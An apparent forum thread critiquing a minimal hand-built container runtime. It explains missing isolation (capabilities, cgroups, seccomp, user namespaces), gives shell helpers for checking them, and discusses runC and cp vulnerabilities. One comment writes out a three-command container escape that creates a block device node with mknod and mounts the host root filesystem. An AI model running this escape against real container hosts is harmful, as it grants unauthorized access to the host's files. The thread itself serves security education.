Definitely not secure. The author did a great job explaining container runtimes in basic terms, but there are a lot of security features missing. Mainly:
* Reducing the container's capabilities
* Restricting access to resources through cgroups
* Applying seccomp filters to prevent certain syscalls.
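A quick way to see whether a runtime applies the first and third of these is to read the process status from inside the container. This is a minimal sketch, not a complete audit: `show_hardening` is a hypothetical helper name, and it assumes a Linux kernel recent enough to expose the `Seccomp` and `NoNewPrivs` fields in `/proc/<pid>/status`.

```shell
#!/usr/bin/env bash
# show_hardening (hypothetical helper): print the capability and seccomp
# fields of a process status file (default: the current process).
#   CapEff / CapBnd: effective and bounding capability sets, as hex bitmasks
#   Seccomp:         0 = disabled, 1 = strict mode, 2 = filter mode
show_hardening() {
    local status_file="${1:-/proc/self/status}"
    grep -E '^(CapEff|CapBnd|Seccomp|NoNewPrivs):' "$status_file"
}
```

Running `show_hardening` in a shell inside the container and seeing a full `CapEff` mask together with `Seccomp: 0` suggests that neither capabilities nor seccomp are being restricted. The cgroup membership can be inspected separately with `cat /proc/self/cgroup`.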
As another comment suggested, user namespaces are another hardening feature, but not all container runtimes enable them by default. Podman does, Docker doesn't. In fact, user namespaces are so powerful that I believe they cover most of the hardening provided by the three features I listed above. If you're wondering why they're not enabled by default in Docker, take a look at this [1].
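To check whether a container is actually running in a remapped user namespace, you can look at its UID map. The sketch below is only a heuristic, and `is_identity_uid_map` is a hypothetical helper name: it treats the mapping `0 0 4294967295` as "container root is host root", which is what the initial user namespace shows, although a nested namespace could in principle carry the same mapping.

```shell
#!/usr/bin/env bash
# is_identity_uid_map (hypothetical helper): succeed if the given uid_map
# is the identity mapping over the full 32-bit UID range.
# Each uid_map line has three fields:
#   <first ID inside the namespace> <first ID outside> <length of the range>
is_identity_uid_map() {
    local map_file="${1:-/proc/self/uid_map}"
    local inside outside length
    # Only the first line is inspected; leading whitespace is trimmed by read.
    read -r inside outside length < "$map_file"
    [ "$inside" = "0" ] && [ "$outside" = "0" ] && [ "$length" = "4294967295" ]
}
```

For example, `is_identity_uid_map && echo "no UID remapping"` run inside the container prints the message when UID 0 in the container maps straight to UID 0 on the host.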
Exploiting the missing isolation mechanisms, the following bash commands will allow you to escape from the author's containers:
$ ls -al /sys/dev/block # find the root fs device (e.g. /dev/sda1) major and minor device numbers (e.g. {maj=8, min=1}, {maj=259, min=1})
$ mknod --mode 0600 /dev/host_fs_dev b $major $minor
$ mkdir /host_fs && mount /dev/host_fs_dev /host_fs
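The commands above depend on two capabilities: creating a block device node with mknod requires CAP_MKNOD (capability number 27), and mount requires CAP_SYS_ADMIN (number 21). As a rough sketch, the following checks whether those bits are set in a `CapEff` mask. `has_cap` is a hypothetical helper, and the sample mask in the usage note is only an illustrative restricted set, not a claim about any particular runtime.

```shell
#!/usr/bin/env bash
# has_cap (hypothetical helper): succeed if capability number $2 is set
# in the hexadecimal capability mask $1 (as printed in /proc/<pid>/status).
has_cap() {
    local mask_hex="$1" cap_number="$2"
    [ $(( (0x$mask_hex >> cap_number) & 1 )) -eq 1 ]
}

# Read the effective capability mask of the current process.
current_cap_eff() {
    awk '/^CapEff:/ { print $2 }' /proc/self/status
}
```

Inside a container, `has_cap "$(current_cap_eff)" 27 && has_cap "$(current_cap_eff)" 21` succeeding means both prerequisites for the escape are present. With a restricted sample mask such as `00000000a80425fb`, bit 27 is set but bit 21 is not, so the mount step would be refused even before device cgroup rules come into play.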
(warning: shameless plug to my posts follows:)
If you want more details, I wrote a post on this exact same problem in the context of three vulnerabilities I found in rkt (another container runtime) [2].
Besides the issues above, the author's runtime also exposes host file descriptors like /proc/self/exe that can be used to escape the container. I wrote a post on runC CVE-2019-5736 that explains this kind of issue [3].
Thank you for the detailed answer and interesting links!
Could you please explain, or point me to a source that explains, why Docker can't use the host network namespace (--net=host) if userns is enabled, while rootlesskit[1], which uses userns by default, doesn't have a problem using the host netns (--net=host)?
Hi, OP here.
You're correct on the symlink point: symlinks are the reason chrooting is needed, as they caused several vulnerabilities in Docker and Podman cp in the past. The good news is that there is a new syscall designed to solve that exact problem, openat2(), which you'll be able to use to restrict path resolution when opening files (https://lwn.net/Articles/796868/). It will make helper processes and chrooting into the container redundant.
Running helper processes entirely in the container is actually quite problematic, since they will be visible to processes in the container that could try to affect their output. This solution is used in Kubernetes, though, and it resulted in 4 vulnerabilities in the last year. Ariel Zelivansky and I just gave a talk on the security of the cp command at KubeCon; you can check out the slides here (https://kccncna19.sched.com/event/d229f00f143036f7c488144e60...) for more information.
As for the fix, I'm pretty sure newer Golang versions stopped dynamically loading libraries at runtime, which is nice. I should have included that in the post but forgot.
That's an option, and actually what LXD does. It's better than just chrooting, though in the case of this vulnerability the exploit would still work even if docker-tar entered the mount NS.
[1] https://docs.docker.com/engine/security/userns-remap/#user-n...
[2] https://unit42.paloaltonetworks.com/breaking-out-of-coresos-...
[3] https://unit42.paloaltonetworks.com/breaking-docker-via-runc...